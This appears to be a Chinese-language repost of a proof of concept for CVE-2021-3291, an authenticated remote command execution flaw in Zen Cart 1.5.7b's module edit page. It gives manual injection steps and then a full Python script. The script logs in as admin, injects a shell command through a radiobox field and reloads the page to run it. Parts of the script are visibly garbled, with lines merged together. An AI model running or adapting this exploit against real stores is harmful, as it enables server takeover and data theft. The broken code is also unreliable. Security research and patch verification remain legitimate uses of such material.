# Zen Cart 1.5.7b 任意命令执行(CVE-2021-3291)
Zen Cart 1.5.7b 管理员通过检查HTML radiobox元素(在模块编辑页面内),通过插入命令来执行任意命令。
* 1-)以管理员身份登录
* 2-)获取任何模块编辑页面
* 3-)检查元素任何真实的单选框
* 4-)将true更改为true’,’MODULE_ORDER_TOTAL_TOTAL_STATUS’); echo `id`; //
* 5-)点击更新
* 6-)触发命令再次进入编辑页面
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
**zencart_v157b_authenticated_rce_exploit.py:**
“`py
#!/usr/bin/python3
import mechanize as mc
import sys
import re
from bs4 import BeautifulSoup as bs
import base64 as B
try:
url = sys.argv[1]
assert url[-1] == “/”
username = sys.argv[2]
password = sys.argv[3]
com = sys.argv[4]
except:
print (“Usage: {sys.argv[0]} http://target.com/zencart/crackXXXXX/ username password command”)
exit(1)
moduls = [“payment”,”shipping”,”ordertotal”,”plugin_manager”] # default
br = mc.Browser()
br.set_handle_robots(False)
br.addheaders=[(‘User-agent’,’Chrome’)]
br.open(url+”login.php”)
br.select_form(“loginForm”)
br.form[“admin_name”] = username
br.form[“admin_pass”] = password
send = br.submit()
mod = moduls[0]
adres = url+”index.php?cmd=modules&set=”+mod
kaynak = br.open(adres).read()
adr = re.findall(b’Edit” in kaynak:
print (f”Target url: {ek}&action=edit”)
br.open(ek+”&action=edit”)
br.select_form(“modules”)
form = br.forms()[0]
liste = b””
for con in form.controls:
try:
deger = br.form.find_control(name=con.name).value
boyut = len(deger)
if type(deger) == list:
if boyut == 0 or deger[0] == “True” or deger[0] == “False”:
liste += con.name.encode() + b”=” + f”True’,’F’); echo `/bin/bash -c ‘{com}’`; //”.encode() + b”&”
print(“Payload injected”)
else:
liste += con.name.encode() + b”=” + deger[0].encode() + b”&”
else:
liste += con.name.encode() + b”=” + deger.encode() + b”&”
except:
pass
print (liste[:-1])
#br.set_proxies({“http”: “localhost:5555″})
ac = br.open(ek+”&action=save”, liste[:-1])
son = br.open(ek+”&action=edit”)
son = br.open(ek+”&action=edit”)
son = br.open(ek+”&action=edit”)
break
“`
from:https://github.com/MucahitSaratar/zencart_auth_rce_poc
请登录后查看评论内容